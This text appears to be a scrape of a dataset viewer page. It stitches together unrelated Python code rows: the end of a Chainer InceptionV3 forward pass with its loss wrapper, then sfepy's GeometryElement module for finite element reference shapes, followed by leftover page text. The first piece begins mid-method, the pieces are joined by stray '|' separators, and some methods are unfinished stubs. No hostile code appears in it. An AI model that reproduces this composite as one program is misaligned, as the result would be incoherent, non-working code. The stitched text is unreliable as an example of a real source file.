            # Stem convolutions interleaved with two 3x3 stride-2 poolings.
            x = self.convolution[0](x)
            x = self.convolution[1](x)
            x = self.convolution[2](x)
            x = M.max_pooling_2d(x, 3, 2)
            x = self.convolution[3](x)
            x = self.convolution[4](x)
            x = M.max_pooling_2d(x, 3, 2)
            return x

        # Original paper and TensorFlow implementation has different
        # auxiliary classifier. We implement latter one.
        def auxiliary_classifier(x, train):
            x = self.auxiliary_convolution(x, train)
            return self.auxiliary_linear(x)

        def classifier(x, train):
            x = A.average_pooling_2d(x, 8)
            x = dropout.dropout(x, train=train)
            x = self.linear(x)
            return x

        # The asserts document the expected (channel, height, width) after
        # each stage; the 35x35 starting size presumably corresponds to a
        # 299x299 input -- TODO confirm.
        x = convolution(x, train)
        assert x.data.shape[1:] == (192, 35, 35),\
            'actual={}'.format(x.data.shape[1:])
        x = self.inception[0](x, train)
        assert x.data.shape[1:] == (288, 35, 35),\
            'actual={}'.format(x.data.shape[1:])
        x = self.grid_reduction[0](x, train)
        assert x.data.shape[1:] == (768, 17, 17),\
            'actual={}'.format(x.data.shape[1:])
        x = self.inception[1](x, train)
        assert x.data.shape[1:] == (768, 17, 17),\
            'actual={}'.format(x.data.shape[1:])
        y_aux = auxiliary_classifier(x, train)
        x = self.grid_reduction[1](x, train)
        assert x.data.shape[1:] == (1280, 8, 8),\
            'actual={}'.format(x.data.shape[1:])
        x = self.inception[2](x, train)
        assert x.data.shape[1:] == (2048, 8, 8),\
            'actual={}'.format(x.data.shape[1:])
        y = classifier(x, train)
        # Cache the outputs for inspection by callers.
        self.y = y
        self.y_aux = y_aux
        return y, y_aux
class InceptionV3Classifier(link.Chain):
    """Wraps an InceptionV3 predictor and computes the summed
    softmax-cross-entropy loss of the main and auxiliary outputs."""

    def __init__(self, predictor):
        super(InceptionV3Classifier, self).__init__(predictor=predictor)

    def __call__(self, *args):
        # The last argument is the label batch; the rest feed the predictor.
        assert len(args) >= 2
        inputs, t = args[:-1], args[-1]
        self.y, self.y_aux = self.predictor(*inputs)
        loss = S.softmax_cross_entropy(self.y, t)
        loss += S.softmax_cross_entropy(self.y_aux, t)
        self.loss = loss
        return self.loss
| |
"""
GeometryElement describes the geometric entities of a finite element mesh.
Notes
-----
* geometry_data: surface facets are assumed to be of the same kind for
  each geometry element - wedges or pyramids are not supported.
* the orientation is a tuple:
(root1, vertices of direction vectors, swap from, swap to, root2, ...)
"""
from sfepy.base.base import *
# Reference element definitions, keyed by '<dim>_<n_vertex>'.  Each entry
# holds vertex coordinates, face and edge vertex lists (None where the
# entity does not exist), the reference volume, and the orientation tuple
# consumed by setup_orientation().
geometry_data = {
    # Line segment.
    '1_2' : Struct(coors = [[0.0],
                            [1.0]],
                   faces = None,
                   edges = None,
                   volume = 1.0,
                   orientation = None,
                   surface_facet_name = None),

    # Triangle.
    '2_3' : Struct(coors = [[0.0, 0.0],
                            [1.0, 0.0],
                            [0.0, 1.0]],
                   faces = None,
                   edges = [[0, 1],
                            [1, 2],
                            [2, 0]],
                   volume = 0.5,
                   orientation = (0, (1, 2), 1, 2),
                   surface_facet_name = '1_2'),

    # Quadrilateral (unit square).
    '2_4' : Struct(coors = [[0.0, 0.0],
                            [1.0, 0.0],
                            [1.0, 1.0],
                            [0.0, 1.0]],
                   faces = None,
                   edges = [[0, 1],
                            [1, 2],
                            [2, 3],
                            [3, 0]],
                   volume = 1.0,
                   # Not finished...
                   orientation = (0, (1, 3), (0, 1), (3, 2)),
                   surface_facet_name = '1_2'),

    # Tetrahedron.
    '3_4' : Struct(coors = [[0.0, 0.0, 0.0],
                            [1.0, 0.0, 0.0],
                            [0.0, 1.0, 0.0],
                            [0.0, 0.0, 1.0]],
                   faces = [[0, 2, 1],
                            [0, 3, 2],
                            [0, 1, 3],
                            [1, 2, 3]],
                   edges = [[0, 1],
                            [1, 2],
                            [2, 0],
                            [0, 3],
                            [1, 3],
                            [2, 3]],
                   volume = 1.0 / 6.0,
                   orientation = (0, (1, 2, 3), 0, 3),
                   surface_facet_name = '2_3'),

    # Hexahedron (unit cube).
    '3_8' : Struct(coors = [[0.0, 0.0, 0.0],
                            [1.0, 0.0, 0.0],
                            [1.0, 1.0, 0.0],
                            [0.0, 1.0, 0.0],
                            [0.0, 0.0, 1.0],
                            [1.0, 0.0, 1.0],
                            [1.0, 1.0, 1.0],
                            [0.0, 1.0, 1.0]],
                   faces = [[0, 3, 2, 1],
                            [0, 4, 7, 3],
                            [0, 1, 5, 4],
                            [4, 5, 6, 7],
                            [1, 2, 6, 5],
                            [2, 3, 7, 6]],
                   edges = [[0, 1],
                            [1, 2],
                            [2, 3],
                            [3, 0],
                            [4, 5],
                            [5, 6],
                            [6, 7],
                            [7, 4],
                            [0, 4],
                            [1, 5],
                            [2, 6],
                            [3, 7]],
                   volume = 1.0,
                   # Not finished...
                   orientation = (0, (1, 3, 4), (0, 1, 2, 3), (4, 5, 6, 7) ),
                   surface_facet_name = '2_4'),
}
def setup_orientation(vecs_tuple):
    """Unpack a flat orientation tuple into arrays.

    The tuple holds groups of four items:
    (root, direction-vector vertices, swap-from, swap-to, root2, ...).

    Parameters
    ----------
    vecs_tuple : tuple
        Flat orientation specification; its length is a multiple of four.

    Returns
    -------
    roots, vecs, swap_from, swap_to : ndarray
        int32 arrays with one row per group; `vecs`, `swap_from` and
        `swap_to` are at least two-dimensional (ndmin=2).
    """
    # Bug fix: use floor division.  Under Python 3, `len(...) / 4` is a
    # float and range() raises TypeError; `//` is correct on both Python
    # 2 and 3.
    cycle = range(len(vecs_tuple) // 4)

    roots = nm.array([vecs_tuple[4*ii] for ii in cycle], dtype=nm.int32)
    vecs = nm.array([vecs_tuple[4*ii+1] for ii in cycle],
                    dtype=nm.int32, ndmin=2)
    swap_from = nm.array([vecs_tuple[4*ii+2] for ii in cycle],
                         dtype=nm.int32, ndmin=2)
    swap_to = nm.array([vecs_tuple[4*ii+3] for ii in cycle],
                       dtype=nm.int32, ndmin=2)

    return roots, vecs, swap_from, swap_to
class GeometryElement(Struct):
    """
    The geometric entities of a finite element mesh.
    """

    def __init__(self, name):
        """
        Set up vertex/edge/face arrays and orientation data from the
        geometry_data table.

        Parameters
        ----------
        name : str
            The name of the entity, one of the keys in geometry_data
            dictionary.
        """
        self.name = name

        gd = geometry_data[name]

        self.coors = nm.array(gd.coors, dtype=nm.float64)

        self.n_vertex, self.dim = self.coors.shape
        # A simplex has exactly dim + 1 vertices.
        self.is_simplex = self.n_vertex == (self.dim + 1)

        self.vertices = nm.arange(self.n_vertex, dtype=nm.int32)

        if gd.edges is not None:
            self.edges = nm.array(gd.edges, dtype=nm.int32)
            self.n_edge = self.edges.shape[0]
        else:
            # Entity has no edges (the 1D segment); keep the None.
            self.edges = gd.edges
            self.n_edge = 0

        if gd.faces is not None:
            self.faces = nm.array(gd.faces, dtype=nm.int32)
            self.n_face = self.faces.shape[0]
        else:
            # Entity has no faces (1D and 2D elements); keep the None.
            self.faces = gd.faces
            self.n_face = 0

        if gd.orientation is not None:
            aux = setup_orientation(gd.orientation)
            self.orientation = Struct(name='orientation',
                                      roots=aux[0], vecs=aux[1],
                                      swap_from=aux[2], swap_to=aux[3])
        else:
            self.orientation = None

        # surface_facet is created lazily by create_surface_facet().
        self.surface_facet_name = gd.surface_facet_name
        self.surface_facet = None

    def get_interpolation_name(self):
        """
        Get the name of corresponding linear interpolant.
        """
        # P1 for simplices, Q1 for tensor-product elements.
        if self.is_simplex:
            suffix = '_P1'
        else:
            suffix = '_Q1'
        return self.name + suffix

    def get_surface_entities(self):
        """
        Return self.vertices in 1D, self.edges in 2D and self.faces in 3D.
        """
        if self.dim == 1:
            return self.vertices
        elif self.dim == 2:
            return self.edges
        else:
            assert_(self.dim == 3)
            return self.faces

    def get_edges_per_face(self):
        """
        Return the indices into self.edges per face.
        """
        if self.dim == 3:
            # Assign edges to a face (in order).
            indx = {3: [[0, 1], [1, 2], [2, 0]],
                    4: [[0, 1], [1, 2], [2, 3], [3, 0]]}
            epf = []
            # Compare edges as vertex sets so direction does not matter.
            se = [set(edge) for edge in self.edges]
            iis = indx[self.surface_facet.n_vertex]
            for face in self.faces:
                aux = []
                for ii in iis:
                    edge = set(face[ii])
                    ie = se.index(edge)
                    aux.append(ie)
                epf.append(aux)
        else:
            # In lower dimensions each "face" is just the edge itself.
            epf = nm.arange(self.edges.shape[0])[:,nm.newaxis]

        return nm.array(epf, dtype=nm.int32)

    def create_surface_facet(self):
        """
        Create a GeometryElement instance corresponding to this instance
        surface facet.
        """
        self.surface_facet = GeometryElement(self.surface_facet_name)

    def orient_edges(self, edges):
        """
        Return the edge orientation flag.
        """
        # 0 when the vertex pair is already ascending, 1 when swapped.
        return nm.where(edges[:,0] < edges[:,1], 0, 1)

    def orient_faces3(self, faces):
        # NOTE(review): not implemented yet.
        pass

    def orient_faces4(self, faces):
        # NOTE(review): not implemented yet.
        pass
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.